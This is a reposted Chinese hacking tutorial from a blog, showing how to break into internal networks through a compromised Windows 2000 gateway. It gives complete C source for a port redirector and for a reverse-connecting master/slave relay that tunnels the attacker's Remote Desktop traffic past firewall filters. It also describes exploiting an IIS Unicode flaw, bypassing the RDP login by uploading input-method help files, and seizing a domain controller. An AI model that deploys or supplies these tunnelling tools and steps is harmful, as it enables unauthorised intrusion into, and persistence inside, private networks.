現在很多企業或者公司基本上網方式基本上都是申請一條連接到Internet的線路,寬帶、DDN、ADSL、ISDN等等,然後用一台服務器做網關,服務器兩塊網卡,一塊是連接到Internet,另一塊是連接到內網的HUB或者交換機,然後內網的其他機器就可以通過網關連接到Internet。
  也許有些人會這樣想,我在內網之中,我們之間沒有直接的連接,你沒有辦法攻擊我。事實並非如此,在內網的機器同樣可能遭受到來自Internet的攻擊,當然前提是攻擊者已經取得網關服務器的某些權限,呵呵,這是不是廢話?其實,Internet上很多做網關的服務器並未經過嚴格的安全配置,要獲取權限也不是想像中的那麼難。
  Ok!廢話就不說了,切入正題。我們的目標是用我們的TermClient[M$終端服務客戶端]連接到敵人內網的TermServer機器。M$的終端服務是一個很好的遠程管理工具,不是嗎?呵呵。沒有做特別說明的話,文中提到的服務器OS都為windows
2000。服務器為Linux或其他的話,原理也差不多,把程序稍微修改就行了。
<<第一部分:利用TCP socket數據轉發進入沒有防火牆保護的內網>>
  假設敵人網絡拓撲如下圖所示,沒有安裝防火牆或在網關服務器上做TCP/IP限制。
  我們的目標是連接上敵人內網的Terminal
Server[192.168.1.3],因為沒有辦法直接和他建立連接,那麼只有先從它的網關服務器上下手了。假如敵人網關服務器是M$的windows
2k,IIS有Unicode漏洞[現在要找些有漏洞的機器太容易了,但我只是scripts
kid,只會利用現成的漏洞做些簡單的攻擊:(555),那麼我們就得到一個網關的shell了,我們可以在那上面運行我們的程序,雖然權限很低,但也可以做很多事情了。Ok!讓我們來寫一個做TCP
socket數據轉發的小程序,讓敵人的網關服務器忠實的為我[202.1.1.1]和敵人內網的TermServer[192.168.1.3]之間轉發數據。題外話:實際入侵過程是先取得網關服務器的權限,然後用他做跳板,進一步摸清它的內部網絡拓撲結構,再做進一步的入侵,現在敵人的網絡拓撲是我們給他設計的,哈哈。
攻擊流程如下:
<1>在網關服務器202.2.2.2運行我們的程序AgentGateWay,他監聽TCP
3389端口[改成別的,那我們就要相應的修改TermClient了]等待我們去連接。
<2>我們202.1.1.1用TermClient連接到202.2.2.2:3389。
<3>202.2.2.2.接受202.1.1.1的連接,然後再建立一個TCP
socket連接到自己內網的TermServer[192.168.1.3]
<4>這樣我們和敵人內網的TermServer之間的數據通道就建好了,接下來網關就忠實的為我們轉發數據啦。當我們連接到202.2.2.2:3389的時候,其實出來的界面是敵人內網的192.168.1.3,感覺怎麼樣?:)
程序代碼如下:
/**********************************************************************
Module Name:AgentGateWay.c
Date:2001/4/15
CopyRight(c) eyas
說明:端口重定向工具,在網關上運行,把端口重定向到內網的IP、PORT,
就可以進入內網了
sock[0]==>sClient sock[1]==>sTarget
**********************************************************************/
#include
#include
#include "TCPDataRedird.c"
#define TargetIP TEXT("192.168.1.3")
#define TargetPort (int)3389
#define ListenPort (int)3389//監聽端口
#pragma comment(lib,"ws2_32.lib")
int main()
{
WSADATA wsd;
SOCKET sListen=INVALID_SOCKET,//本機監聽的socket
sock[2];
struct sockaddr_in Local,Client,Target;
int iAddrSize;
HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
hThreadT2C=NULL;//T2C=TargetToClient
DWORD dwThreadID;
__try
{
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
{
printf("\nWSAStartup() failed:%d",GetLastError());
__leave;
}
sListen=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if(sListen==INVALID_SOCKET)
{
printf("\nsocket() failed:%d",GetLastError());
__leave;
}
Local.sin_addr.s_addr=htonl(INADDR_ANY);
Local.sin_family=AF_INET;
Local.sin_port=htons(ListenPort);

Target.sin_family=AF_INET;
Target.sin_addr.s_addr=inet_addr(TargetIP);
Target.sin_port=htons(TargetPort);

if(bind(sListen,(struct sockaddr
*)&Local,sizeof(Local))==SOCKET_ERROR)
{
printf("\nbind() failed:%d",GetLastError());
__leave;
}
if(listen(sListen,1)==SOCKET_ERROR)
{
printf("\nlisten() failed:%d",GetLastError());
__leave;
}
//scoket循環
while(1)
{
printf("\n\n*************Waiting Client Connect
to**************\n\n");
iAddrSize=sizeof(Client);
//get socket sClient
sock[0]=accept(sListen,(struct sockaddr *)&Client,&iAddrSize);
if(sock[0]==INVALID_SOCKET)
{
printf("\naccept() failed:%d",GetLastError());
break;
}
printf("\nAccept client==>%s:%d",inet_ntoa(Client.sin_addr),
ntohs(Client.sin_port));
//create socket sTarget
sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if(sock[1]==INVALID_SOCKET)
{
printf("\nsocket() failed:%d",GetLastError());
__leave;
}
//connect to target port
if(connect(sock[1],(struct sockaddr
*)&Target,sizeof(Target))==SOCKET_ERROR)
{
printf("\nconnect() failed:%d",GetLastError());
__leave;
}
printf("\nconnect to target 3389 success!");
//創建兩個線程進行數據轉發
hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);
hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);
//等待兩個線程結束
WaitForSingleObject(hThreadC2T,INFINITE);
WaitForSingleObject(hThreadT2C,INFINITE);
CloseHandle(hThreadC2T);
CloseHandle(hThreadT2C);
closesocket(sock[1]);
closesocket(sock[0]);
printf("\n\n*****************Connection
Close*******************\n\n");
}//end of sock外循環
}//end of try
__finally
{
if(sListen!=INVALID_SOCKET) closesocket(sListen);
if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);
if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);
if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);
if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);
WSACleanup();
}
return 0;
}
/*************************************************************************
Module:TCPDataRedird.c
Date:2001/4/16
CopyRight(c) eyas
HomePage:www.patching.net
Thanks to shotgun
說明:TCP socket數據轉發,sock[0]==>sClient sock[1]==>sTarget
*************************************************************************/
#define BuffSize 20*1024 //緩衝區大小20k
//此函數負責從Client讀取數據,然後轉發給Target
DWORD WINAPI TCPDataC2T(SOCKET* sock)
{
int iRet,
ret=-1,//select 返回值
iLeft,
idx,
iSTTBCS=0;//STTBCS=SendToTargetBuffCurrentSize
char szSendToTargetBuff[BuffSize]=,
szRecvFromClientBuff[BuffSize]=;
fd_set fdread,fdwrite;
printf("\n\n*****************Connection
Active*******************\n\n");
while(1)
{
FD_ZERO(&fdread);
FD_ZERO(&fdwrite);
FD_SET(sock[0],&fdread);
FD_SET(sock[1],&fdwrite);
if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)
{
printf("\nselect() failed:%d",GetLastError());
break;
}
//printf("\nselect() return value ret=%d",ret);
if(ret>0)
{
//sClinet可讀,client有數據要發送過來
if(FD_ISSET(sock[0],&fdread))
{
//接收sock[0]發送來的數據
iRet=recv(sock[0],szRecvFromClientBuff,BuffSize,0);
if(iRet==SOCKET_ERROR)
{
printf("\nrecv() from sock[0] failed:%d",GetLastError());
break;
}
else if(iRet==0)
break;
printf("\nrecv %d bytes from sClinet.",iRet);
//把從client接收到的數據存添加到發往target的緩衝區
memcpy(szSendToTargetBuff+iSTTBCS,szRecvFromClientBuff,iRet);
//刷新發往target的數據緩衝區當前buff大小
iSTTBCS+=iRet;
//清空接收client數據的緩衝區
memset(szRecvFromClientBuff,0,BuffSize);
}
//sTarget可寫,把從client接收到的數據發送到target
if(FD_ISSET(sock[1],&fdwrite))
{
//轉發數據到target的3389端口
iLeft=iSTTBCS;
idx=0;
while(iLeft>0)
{
iRet=send(sock[1],&szSendToTargetBuff[idx],iLeft,0);
if(iRet==SOCKET_ERROR)
{
printf("\nsend() to target failed:%d",GetLastError());
break;
}
printf("\nsend %d bytes to target",iRet);
iLeft-=iRet;
idx+=iRet;
}
//清空緩衝區
memset(szSendToTargetBuff,0,BuffSize);
//重置發往target的數據緩衝區當前buff大小
iSTTBCS=0;
}
}//end of select ret
Sleep(1);
}//end of data send & recv循環
return 0;
}
//此函數負責從target讀取數據,然後發送給client
DWORD WINAPI TCPDataT2C(SOCKET* sock)
{
int iRet,
ret=-1,//select 返回值
iLeft,
idx,
iSTCBCS=0;//STCBCS=SendToClientBuffCurrentSize
char szRecvFromTargetBuff[BuffSize]=,
szSendToClientBuff[BuffSize]=;
fd_set fdread,fdwrite;

while(1)
{
FD_ZERO(&fdread);
FD_ZERO(&fdwrite);
FD_SET(sock[0],&fdwrite);
FD_SET(sock[1],&fdread);
if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR)
{
printf("\nselect() failed:%d",GetLastError());
break;
}
if(ret>0)
{
//sTarget可讀,從target接收數據
if(FD_ISSET(sock[1],&fdread))
{
//接收target返回數據
iRet=recv(sock[1],szRecvFromTargetBuff,BuffSize,0);
if(iRet==SOCKET_ERROR)
{
printf("\nrecv() from target failed:%d",GetLastError());
break;
}
else if(iRet==0)
break;
printf("\nrecv %d bytes from target",iRet);
//把從target接收到的數據添加到發送到client的緩衝區
memcpy(szSendToClientBuff+iSTCBCS,szRecvFromTargetBuff,iRet);
//清空接收target返回數據緩衝區
memset(szRecvFromTargetBuff,0,BuffSize);
//刷新發送到client的數據緩衝區當前大小
iSTCBCS+=iRet;
}
//client可寫,發送target返回數據到client
if(FD_ISSET(sock[0],&fdwrite))
{
//發送target返回數據到client
iLeft=iSTCBCS;
idx=0;
while(iLeft>0)
{
iRet=send(sock[0],&szSendToClientBuff[idx],iLeft,0);
if(iRet==SOCKET_ERROR)
{
printf("\nsend() to Client failed:%d",GetLastError());
break;
}
printf("\nsend %d bytes to Client",iRet);
iLeft-=iRet;
idx+=iRet;
}
//清空緩衝區
memset(szSendToClientBuff,0,BuffSize);
iSTCBCS=0;
}
}//end of select ret
Sleep(1);
}//end of while
return 0;
}
(利用TCP socket轉發和反彈TCP端口進入有防火牆保護的內網)
  事實上很多內網沒有第一部分所說的那麼簡單啦,我們來看一個有防火牆保護的內網,前提是這個防火牆對反彈TCP端口不做限制,限制了的話,又另當別論了。假設網絡拓撲如下:
上面的網絡拓撲是我在一次對朋友公司網站授權入侵過程中遇到的。
〈1〉我自己處於公司內網192.168.0.2,通過公司網關202.1.1.1到Internet,但我是網關的admin:)。
〈2〉敵人[其實是friend啦]的網關OS是2k adv
server,在外網網卡上做了TCP/IP限制,只開放了25,53,80,110,3306這幾個TCP
PORT,通過一個漏洞,我得到了一個shell,可以通過IE來執行系統命令,雖然權限很低。網關有終端服務,登陸驗證漏洞補丁未安裝,但輸入法幫助文件已經被刪除了,但是我們可以通過shell把輸入法幫助文件upload上去,因為他的系統權限沒有設置好,我們可以寫,呵呵。這樣的話,我們只要能夠連接到他的終端服務上去,我們就能繞過登陸驗證,得到admin權限了。如何連接?有辦法,用TCP
socket轉發。和第一部分說的一樣嗎?有些不同。因為他做了TCP/IP限制,我們不能連接他,只能讓他來連接我們了,TCP反彈端口,呵呵。
攻擊流程如下:
〈1〉在我的服務器202.1.1.1運行AgentMaster,監聽TCP PORT
12345,等待202.2.2.2來連接,監聽TCP PORT 3389,等待我192.168.0.2連接。
〈2〉在敵人網關機器202.2.2.2運行AgentSlave,連接到202.1.1.1 TCP PORT
12345[注意:是反彈端口,TCP/IP過濾也拿他沒辦法]
〈3〉我自己192.168.0.2用TermClient連接到自己的服務器202.1.1.1:3389
〈4〉敵人網關上的AgentSlave連接到自己本身在內網的IP==〉192.168.1.1:3389
〈5〉數據通道就建立好啦。兩個代理忠實的為我們轉發數據,呵呵。當我們連接自己服務器的3389,其實出來的是敵人內網的某台機器,呵呵。
  後來發現敵人的主域控制器是192.168.1.4,通過前面與他網關建立的連接,利用一個漏洞輕易的取得主域的admin權限,呵呵。他可能認為主域在內網,網關又做了TCP/IP過濾,攻擊者沒有辦法進入。我只要把AgentSlave設置為連接192.168.1.4:3389,以後就可以直接連接他的主域控制器啦,不過在網關登陸也一樣。
程序代碼如下[程序中所用到的TCPDataRedird.c已經貼在第一部分,那個文件做數據轉發,通用的:
/******************************************************************************
Module Name:AgentMaster.c
Date:2001/4/16
CopyRight(c) eyas
說明:scoket代理主控端,負責監聽兩個TCP socket,等待攻擊者和AgentSlave來連接,兩個
scoket都連接成功後,開始轉發數據
sock[0]是client==〉sock[0] sock[1]是target==〉sock[1]
******************************************************************************/
#include 〈stdio.h〉
#include 〈winsock2.h〉
#include "TCPDataRedird.c"
#pragma comment(lib,"ws2_32.lib")
#define TargetPort 3389//偽裝的target的監聽端口
#define LocalPort 12345//等待AgentSlave來connect的端口
int main()
{
WSADATA wsd;
SOCKET s3389=INVALID_SOCKET,//本機監聽的socket,等待攻擊者連接
s1981=INVALID_SOCKET,//監聽的socket,等待AgentSlave來連接
sock[2]=;
struct sockaddr_in Local3389,Local1981,Attack,Slave;
int iAddrSize;
HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
hThreadT2C=NULL;//T2C=TargetToClient
DWORD dwThreadID;
__try
{
//load winsock library
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
{
printf("\nWSAStartup() failed:%d",GetLastError());
__leave;
}
//create socket
s3389=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if(s3389==INVALID_SOCKET)
{
printf("\nsocket() failed:%d",GetLastError());
__leave;
}
//create socket
s1981=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if(s1981==INVALID_SOCKET)
{
printf("\nsocket() failed:%d",GetLastError());
__leave;
}
//fill the struct
Local3389.sin_addr.s_addr=htonl(INADDR_ANY);
Local3389.sin_family=AF_INET;
Local3389.sin_port=htons(TargetPort);
Local1981.sin_addr.s_addr=htonl(INADDR_ANY);
Local1981.sin_family=AF_INET;
Local1981.sin_port=htons(LocalPort);
//bind s3389 for attacker
if(bind(s3389,(struct sockaddr
*)&Local3389,sizeof(Local3389))==SOCKET_ERROR)
{
printf("\nbind() failed:%d",GetLastError());
__leave;
}
//listen for attacker to connect
if(listen(s3389,1)==SOCKET_ERROR)
{
printf("\nlisten() failed:%d",GetLastError());
__leave;
}
//bind s1981 for AgentSlave
if(bind(s1981,(struct sockaddr
*)&Local1981,sizeof(Local1981))==SOCKET_ERROR)
{
printf("\nbind() failed:%d",GetLastError());
__leave;
}
//listen for AgentSlave to connect
if(listen(s1981,1)==SOCKET_ERROR)
{
printf("\nlisten() failed:%d",GetLastError());
__leave;
}
//socket循環
while(1)
{
//wait for AgentSlave to connect
iAddrSize=sizeof(Slave);
sock[1]=accept(s1981,(struct sockaddr *)&Slave,&iAddrSize);
if(sock[1]==INVALID_SOCKET)
{
printf("\naccept() failed:%d",GetLastError());
break;
}
printf("\nAccept AgentSlave==〉%s:%d",inet_ntoa(Slave.sin_addr),
ntohs(Slave.sin_port));
//wait for Attacker to connect
iAddrSize=sizeof(Attack);
sock[0]=accept(s3389,(struct sockaddr *)&Attack,&iAddrSize);
if(sock[0]==INVALID_SOCKET)
{
printf("\naccept() failed:%d",GetLastError());
break;
}
printf("\nAccept Attacker==〉%s:%d",inet_ntoa(Attack.sin_addr),
ntohs(Attack.sin_port));
//創建兩個線程進行數據轉發
hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);
hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);
//等待兩個線程結束
WaitForSingleObject(hThreadC2T,INFINITE);
CloseHandle(hThreadC2T);
CloseHandle(hThreadT2C);
closesocket(sock[0]);
closesocket(sock[1]);
}//end of socket while
}//end of try
__finally
{
//clean all
if(s3389!=INVALID_SOCKET) closesocket(s3389);
if(s1981!=INVALID_SOCKET) closesocket(s1981);
if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);
if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);
if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);
if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);
WSACleanup();
}
return 0;
}
/***********************************************************************************
Module:AgentSlave.c
Date:2001/4/17
Copyright(c)eyas
HomePage:www.patching.net
說明:這個程序負責連接最終目標,連接主控端,然後轉發數據
這裡連接到AgenrMaster的socket相當與sClient==〉sock[0],
連接到最終目標的socoket是sTarget==〉sock[1]
***********************************************************************************/
#include 〈stdio.h〉
#include 〈winsock2.h〉
#include "TCPDataRedird.c"
#pragma comment(lib,"ws2_32.lib")
#define TargetIP "192.168.1.3"
#define TargetPort (int)3389
#define AgentMasterIP "202.1.1.1"
#define AgentMasterPort (int)12345
int main()
{
WSADATA wsd;
SOCKET sock[2]=;
struct sockaddr_in Master,Target;
HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
hThreadT2C=NULL;//T2C=TargetToClient
DWORD dwThreadID;
__try
{
//load winsock library
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
{
printf("\nWSAStartup() failed:%d",GetLastError());
__leave;
}
//循環
while(1)
{
//create client socket
sock[0]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if(sock[0]==INVALID_SOCKET)
{
printf("\nsocket() failed:%d",GetLastError());
__leave;
}
//create target socket
sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if(sock[1]==INVALID_SOCKET)
{
printf("\nsocket() failed:%d",GetLastError());
__leave;
}
//fill struct
Target.sin_family=AF_INET;
Target.sin_addr.s_addr=inet_addr(TargetIP);
Target.sin_port=htons(TargetPort);
Master.sin_family=AF_INET;
Master.sin_addr.s_addr=inet_addr(AgentMasterIP);
Master.sin_port=htons(AgentMasterPort);
//connect to AgentMaster
if(connect(sock[0],(struct sockaddr
*)&Master,sizeof(Master))==SOCKET_ERROR)
{
//連接失敗後,等待一會兒再連
printf("\nconnect() to master failed:%d",GetLastError());
closesocket(sock[0]);
closesocket(sock[1]);
Sleep(5000);
continue;
}
printf("\nconnect to %s %d success!",AgentMasterIP,AgentMasterPort);
//connect to target
if(connect(sock[1],(struct sockaddr
*)&Target,sizeof(Target))==SOCKET_ERROR)
{
printf("\nconnect() to target failed:%d",GetLastError());
__leave;
}
printf("\nconnect to %s %d success!",TargetIP,TargetPort);
//創建兩個線程進行數據轉發
hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);
hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);
//等待兩個線程結束
WaitForSingleObject(hThreadC2T,INFINITE);
CloseHandle(hThreadC2T);
CloseHandle(hThreadT2C);
closesocket(sock[0]);
closesocket(sock[1]);
}//end of while
}//end of try
__finally
{
if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);
if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);
if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);
if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);
WSACleanup();
}
return 0;


}

    全站熱搜

    Neo Chao 發表在 痞客邦 留言(0) 人氣()